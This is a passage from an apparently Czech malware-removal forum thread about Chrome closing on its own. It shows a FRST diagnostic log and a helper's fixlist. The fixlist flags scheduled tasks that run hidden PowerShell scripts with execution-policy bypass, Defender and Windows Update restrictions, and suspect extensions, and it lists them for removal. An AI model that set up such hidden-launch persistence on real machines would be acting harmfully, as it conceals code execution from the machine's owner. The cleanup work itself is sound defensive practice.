MSCONFIG\Services: LGHUBUpdaterService => 2
MSCONFIG\Services: Micro Star SCM => 2
MSCONFIG\Services: MSI Foundation Service => 3
MSCONFIG\Services: MyWiFiDHCPDNS => 3
MSCONFIG\Services: NvContainerLocalSystem => 3
MSCONFIG\Services: NVDisplay.ContainerLocalSystem => 2
MSCONFIG\Services: RegSrvc => 2
MSCONFIG\Services: Rockstar Service => 3
MSCONFIG\Services: RtkAudioUniversalService => 3
MSCONFIG\Services: Sendevsvc => 3
MSCONFIG\Services: sshd => 3
MSCONFIG\Services: Steam Client Service => 3
MSCONFIG\Services: tmInstall => 3
MSCONFIG\Services: ZeroConfigService => 3
HKLM\...\StartupApproved\StartupFolder: => "errorlog.txt"
HKLM\...\StartupApproved\StartupFolder: => "FxSound.lnk"
HKLM\...\StartupApproved\StartupFolder: => "AnyDesk.lnk"
HKLM\...\StartupApproved\Run: => "WindowsDefender"
HKLM\...\StartupApproved\Run: => "XMouseButtonControl"
HKLM\...\StartupApproved\Run: => "AdobeAAMUpdater-1.0"
HKLM\...\StartupApproved\Run: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run: => "RtkAudUService"
HKLM\...\StartupApproved\Run: => "THX0520Helper"
HKLM\...\StartupApproved\Run: => "THX22adHelper"
HKLM\...\StartupApproved\Run: => "RZTHXHelper"
HKLM\...\StartupApproved\Run: => "AdobePSE20AutoAnalyzer"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Acrobat Assistant 8.0"
HKLM\...\StartupApproved\Run32: => "AdobeGCInvoker-1.0"
HKLM\...\StartupApproved\Run32: => "haleng"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "APSDaemon"
HKLM\...\StartupApproved\Run32: => "WSHelperSetup.exe"
HKLM\...\StartupApproved\Run32: => "Adguard"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "RT-Updater-SVO.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "Dragon Center.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "DeepL.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\StartupFolder: => "DeepL auto-start.lnk"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "uTorrent"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "DAEMON Tools Pro Agent"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Overwolf"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Facebook.MessengerDesktop"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "com.blitz.app"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "WSHelperSetup.exe"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "LGHUB"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Battle.net"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "EpicGamesLauncher"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "GogGalaxy"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "CCleaner Smart Cleaning"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "DeepL"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Skype for Desktop"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "MicrosoftEdgeAutoLaunch_211F9FEB1C1D0C6ED6DD47C70C7E0A4C"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "RzAppEngine"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "Microsoft Edge Update"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "NoxMultiPlayer"
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\StartupApproved\Run: => "GalaxyClient"

==================== FirewallRules (Whitelisted) ================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [TCP Query User{F594DB9B-3374-4F7C-90CD-532C3E7E5764}C:\program files\google\chrome\application\chrome.exe] => (Allow) C:\program files\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [UDP Query User{D4B527AA-C6C5-4F11-A8B0-E8AC3BF22320}C:\program files\google\chrome\application\chrome.exe] => (Allow) C:\program files\google\chrome\application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [TCP Query User{14566B2B-20A7-4B78-A626-38B6A3B8BB76}C:\program files\qbittorrent\qbittorrent.exe] => (Allow) C:\program files\qbittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [UDP Query User{FC7A9006-89C7-4AAA-9E4F-2E3C28605BA7}C:\program files\qbittorrent\qbittorrent.exe] => (Allow) C:\program files\qbittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [TCP Query User{99B1B6AC-6C75-4CB7-865B-5610998128DB}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [UDP Query User{A1A20F6B-F39A-49A7-A8E4-1290279A8326}C:\program files (x86)\steam\steam.exe] => (Allow) C:\program files (x86)\steam\steam.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{05C699F8-CBA4-4162-91B5-0CC46016C276}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{25EFB1EB-F125-4B2D-B704-6F27D7DE6ADB}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7x64\steamwebhelper.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{DEB07D98-BC86-4F3A-A47E-D70476D75B67}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mad Games Tycoon 2\Mad Games Tycoon 2.exe () [File not signed]
FirewallRules: [{975C8F3D-FC40-4B85-B190-52CE9C129C71}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Mad Games Tycoon 2\Mad Games Tycoon 2.exe () [File not signed]
FirewallRules: [{6BBBEC89-4A6A-4E65-BCF7-1F063AE5F7FD}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\iVRy\bin\win64\StartSteamVR.exe (Ian Dean -> Mediator Software)
FirewallRules: [{4DB5FAFD-BD78-4C87-A5F1-0207D34AE764}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\iVRy\bin\win64\StartSteamVR.exe (Ian Dean -> Mediator Software)
FirewallRules: [{FFBC2101-1909-413D-97E5-1BF627F8E1E9}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{C4DDD45F-694D-4465-80B9-F82CEDE09E68}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\SteamVR\bin\win32\vrstartup.exe (Valve Corp. -> Valve Corporation)
FirewallRules: [{17D0CB48-13E3-4C39-84EC-5B3EB2860C98}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MrPrepper\MrPrepper.exe () [File not signed]
FirewallRules: [{5FB62808-6CC0-47E7-9AF7-7D2A08B0B797}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\MrPrepper\MrPrepper.exe () [File not signed]
FirewallRules: [{9C88F60B-0122-4BB3-8EF8-46DDDE3E72E4}] => (Allow) C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe (Intel Corporation -> )
FirewallRules: [{896A80E7-AC26-4FF4-A393-1CF45B29E436}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{AE818E9B-7552-419A-BA6A-30D476C6AA9E}] => (Allow) C:\Program Files\qBittorrent\qbittorrent.exe (The qBittorrent Project) [File not signed]
FirewallRules: [{852BB5DE-0610-465B-8A4A-E5728564D9F7}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{697F38B8-732E-4F57-BB19-8DDF021C511F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4EF2D863-21B4-4A9E-9A39-6528E150AA0A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{14BB8456-A4E4-4AFC-B865-B3BFF6CDC0D2}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{3E0CB873-4AEE-4794-8D37-2E26B0E2CC49}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PC Building Simulator\PCBS.exe () [File not signed]
FirewallRules: [{2DB81B19-7A5C-4154-B86A-BE6B36294237}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\PC Building Simulator\PCBS.exe () [File not signed]
FirewallRules: [{81453AAC-6B6C-483A-9C9B-E2522A4F7D59}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{9009E995-2EF7-47CC-A027-8BCD7F6BA349}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{010F048D-D6BE-4CFC-8AAB-515074264647}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{248C70CB-A9D0-4E9B-83B1-C379E462EEC9}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{CD0F34CF-5006-409B-AE54-C4722C7EF989}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{06C36938-30B6-4146-ACDE-EC997D340EED}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x64\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{D47B83AF-F511-400C-8E16-0E061855251B}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{9FABF0F4-CFC8-4AA6-B4C5-40F9600BEC75}] => (Allow) D:\SteamLibrary\steamapps\common\Euro Truck Simulator 2\bin\win_x86\eurotrucks2.exe (SCS Software s.r.o. -> SCS Software)
FirewallRules: [{0C78EFB9-B7D3-4B28-B62C-883B5ADDAD19}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CookingSimulator\CookingSim.exe () [File not signed]
FirewallRules: [{E1F2FFC3-2FEA-492B-B6A9-C515C4BA0A1C}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\CookingSimulator\CookingSim.exe () [File not signed]
FirewallRules: [{395B3311-5A73-4561-9758-481CD398A729}] => (Block) PCBS.exe => No File
FirewallRules: [{F9E78C50-FF78-4EA3-8EC0-2081CB5F35C7}] => (Allow) C:\Program Files\Google\Chrome\Application\chrome.exe (Google LLC -> Google LLC)
FirewallRules: [{9DADCF0C-C503-4C11-A789-B1266526BB6A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{BFA2B326-B392-41D0-88E8-0ABE54A6B925}] => (Allow) C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{579A8EE3-B1AA-452F-A197-CD4300A23E07}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{40C1C7F6-512A-4A4E-A4B2-29F15EE259E8}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe (Nvidia Corporation -> NVIDIA Corporation)
FirewallRules: [{86A1097D-D5AD-4D45-897A-1735C2318FC9}] => (Allow) C:\Program Files (x86)\Microsoft\EdgeWebView\Application\107.0.1418.35\msedgewebview2.exe (Microsoft Corporation -> Microsoft Corporation)

==================== Restore Points =========================

22-10-2022 18:02:43 Nainstalováno rozhraní DirectX
01-11-2022 00:31:59 Naplánovaný kontrolní bod
05-11-2022 01:08:38 Installed SeoTools for Excel
05-11-2022 01:28:26 Installed SeoTools for Excel

==================== Faulty Device Manager Devices ============


==================== Event log errors: ========================

Application errors:
==================
Error: (11/07/2022 10:37:31 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:47 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:47 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:46 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:26:46 PM) (Source: .NET Runtime) (EventID: 1023) (User: )
Description: Description: A .NET Core application failed.
Application: CefSharp.BrowserSubprocess.exe
Path: C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.exe
Message: Cannot use file stream for [C:\Users\Woytman\AppData\Local\0install.net\implementations\sha256new_ME32KR4KFS62IPP6CZ6OLXWMK62LKHIR5M2Y3OPQE5VDTOKMLW6A\CefSharp.BrowserSubprocess.deps.json]: No such file or directory

Error: (11/07/2022 10:03:27 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: powershell.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na Class_43d8b462495a4cbea473abce6dac8229.DispatchMessage(MSG ByRef)
na Class_43d8b462495a4cbea473abce6dac8229.Run()
na System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
na System.Threading.ThreadHelper.ThreadStart()

Error: (11/07/2022 10:01:43 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: powershell.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na Class_43d8b462495a4cbea473abce6dac8229.DispatchMessage(MSG ByRef)
na Class_43d8b462495a4cbea473abce6dac8229.Run()
na System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
na System.Threading.ThreadHelper.ThreadStart()

Error: (11/07/2022 10:00:00 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Aplikace: powershell.exe
Verze Framework: v4.0.30319
Popis: Proces byl ukončen z důvodu neošetřené výjimky.
Informace o výjimce: System.AccessViolationException
na Class_43d8b462495a4cbea473abce6dac8229.DispatchMessage(MSG ByRef)
na Class_43d8b462495a4cbea473abce6dac8229.Run()
na System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
na System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
na System.Threading.ThreadHelper.ThreadStart()


System errors:
=============
Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Při čekání na připojení služby Browser bylo dosaženo časového limitu (120000 ms).

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Při čekání na připojení služby Browser bylo dosaženo časového limitu (120000 ms).

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.

Error: (11/07/2022 05:09:31 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Při čekání na připojení služby Browser bylo dosaženo časového limitu (120000 ms).

Error: (11/07/2022 05:07:26 PM) (Source: Server) (EventID: 2505) (User: )
Description: Server nemohl vytvořit vazbu na přenos \Device\NetBT_Tcpip_{E34A0E74-B114-4D52-943C-B674323E6033}, protože jiný počítač v síti má stejný název. Server nelze spustit.

Error: (11/07/2022 05:07:23 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Služba Browser neuspěla při spuštění v důsledku následující chyby:
Služba neodpověděla na řídicí nebo zahajovací požadavek dostatečně včas.


Windows Defender:
================
Date: 2022-11-07 17:59:32
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {355DC3F2-10FD-46DA-84D4-910FF6CD4EA6}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-07 17:07:34
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {7FC8860F-3B2A-4373-B351-309BC0F59CA4}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-07 16:54:43
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {3DF4E607-4B1E-42E5-B720-26281E620DC1}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-03 17:37:28
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {36737B8A-B6E8-4052-B7EB-E4C5B1513503}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

Date: 2022-11-02 18:12:43
Description:
Prohledávání Antivirová ochrana v programu Microsoft Defender bylo zastaveno před dokončením.
ID prohledávání: {BECD1A0B-6F44-47F0-949D-2F2F8D95ADF8}
Typ prohledávání: Antimalwarový program
Parametry prohledávání: Rychlé prohledávání
Uživatel: NT AUTHORITY\SYSTEM

CodeIntegrity:
===============
Date: 2022-10-28 16:37:37
Description:
Code Integrity determined that a process (\Device\HarddiskVolume9\ProgramData\Microsoft\Windows Defender\Platform\4.18.2209.7-0\MsMpEng.exe) attempted to load \Device\HarddiskVolume9\Windows\System32\DriverStore\FileRepository\iigd_dch.inf_amd64_11001eacf352e253\igd10iumd64.dll that did not meet the Custom 3 / Antimalware signing level requirements.


==================== Memory info ===========================

BIOS: American Megatrends Inc. E17F2IMS.109 05/19/2020
Motherboard: Micro-Star International Co., Ltd. MS-17F2
Processor: Intel(R) Core(TM) i7-9750H CPU @ 2.60GHz
Percentage of memory in use: 28%
Total physical RAM: 16227.41 MB
Available physical RAM: 11538.38 MB
Total Virtual: 21560.68 MB
Available Virtual: 15413.1 MB

==================== Drives ================================

Drive c: (Windows) (Fixed) (Total:458 GB) (Free:124.98 GB) (Model: WDC PC SN520 SDAPNUW-512G-1032) NTFS
Drive d: () (Fixed) (Total:436.6 GB) (Free:166.57 GB) (Model: ADATA SU800) NTFS
Drive e: (Nový svazek) (Fixed) (Total:39.06 GB) (Free:31.22 GB) (Model: ADATA SU800) NTFS
Drive z: (SYSTEM) (Fixed) (Total:0.29 GB) (Free:0.26 GB) (Model: WDC PC SN520 SDAPNUW-512G-1032) FAT32

\\?\Volume{ac5adbe9-eb71-4de3-b174-579b4d3f00f2}\ (WinRE tools) (Fixed) (Total:0.88 GB) (Free:0.37 GB) NTFS
\\?\Volume{68105432-156c-48c2-9dc5-3545d3fd71f2}\ (BIOS_RVY) (Fixed) (Total:17.64 GB) (Free:1.57 GB) NTFS
\\?\Volume{288c0601-9bd2-444b-aa81-fe8d4391276a}\ (Obnovení) (Fixed) (Total:0.52 GB) (Free:0.5 GB) NTFS
\\?\Volume{efae0b03-5c84-4269-92d7-bad382baf154}\ () (Fixed) (Total:0.65 GB) (Free:0.08 GB) NTFS
\\?\Volume{fd454674-a2ed-4e9b-bd44-f23aa0e44192}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 476.9 GB) (Disk ID: FF7B3DBC)

Partition: GPT.

==========================================================
Disk: 1 (Size: 476.9 GB) (Disk ID: 0457B8AF)

Partition: GPT.

==================== End of Addition.txt =======================

Re: Chrome shuts down on its own

Post by jaro3 » 08 Nov 2022 15:39

Please proceed as follows:
Open Notepad (Start => All Programs => Accessories => Notepad).
Please copy the entire content below into it.

Code:

Start
CreateRestorePoint:
CloseProcesses:
HKLM\...\Policies\Explorer: [HideSCAMeetNow] 1
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [HideSCAMeetNow] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\...\MountPoints2: {4da3b049-162e-11ed-8c8f-4889e716f2dc} - "F:\Lenovo_Suite.exe"
HKU\S-1-5-18\...\Run: [RazerAxon] => "C:\Program Files (x86)\Razer\Razer Axon\RazerAxon.exe" -autorun (No File)
ShortcutTarget: DeepL auto-start.lnk -> (No File)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Policies\Microsoft\Edge: Restriction <==== ATTENTION
Task: {00AAE17D-5854-4922-8396-86326F51A6D2} - System32\Tasks\update-S-1-5-21-3110588475-2115266248-3539613761-1001 => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Task: {52510CA0-CD65-48FC-99C5-CF57314CEC65} - \Microsoft\Windows\Management\Provisioning\xiHM0g\046E4CE2-D25A-4B57-A2E2-3AD7D55DFBDB -> No File <==== ATTENTION
Task: {5FDD0220-E4B9-4462-AC20-4D9BDB16070E} - System32\Tasks\Microsoft\Windows\Management\Provisioning\User => powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\WINDOWS\System32\57540306-c3ad-454f-bbe7-1c56160757fe.ps1" <==== ATTENTION
Task: {6A7B9D49-E5BF-4199-8990-7D182ADBB306} - System32\Tasks\GoogleUpdateTaskMachineCore{07D74F8D-CE32-4182-A77B-CF36AB803647} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {96BB2A72-BBD3-4A21-B7F2-C23A745E8678} - System32\Tasks\Microsoft\Windows\MUI\LPRemovea93Lqu => powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\WINDOWS\System32\D5910F34-9B2F-4E01-80CF-49460B7AF191.ps1" <==== ATTENTION
Task: {B2F82E57-5A82-46F4-88DC-C41367AF04D9} - System32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440} => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-09-26] (Google LLC -> Google LLC)
Task: {CCDFC0B8-01A3-4E74-A820-4F13F51D269E} - System32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\MNO Metadata Parser => C:\WINDOWS\System32\MbaeParserTask.exe (No File)
Task: {F3ED570E-C6D2-4C9E-964E-E3430B16320F} - System32\Tasks\update-sys => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe -runmode=checkupdate (No File)
Winsock: Catalog9 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9 18 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 17 %windir%\system32\vsocklib.dll => No File
Winsock: Catalog9-x64 18 %windir%\system32\vsocklib.dll => No File
CHR HKU\S-1-5-21-3110588475-2115266248-3539613761-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [bbjllphbppobebmjpjcijfbakobcheof]
CHR HKLM-x32\...\Chrome\Extension: [aegnopegbbhjeeiganiajffnalhlkkjb]
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA{6B43DE8F-643D-4522-8024-BB1F417C3440}
FCheck: C:\WINDOWS\SysWOW64\version_IObitDel.dll [2021-04-03] <==== ATTENTION (zero byte File/Folder)
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2\InprocServer32 -> => No File
CustomCLSID: HKU\S-1-5-21-3110588475-2115266248-3539613761-1001_Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32 -> => No File
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers4: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
ContextMenuHandlers5: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> No File
ContextMenuHandlers6: [Offline Files] -> {474C98EE-CF3D-41f5-80E3-4AAB0AB04301} => -> No File
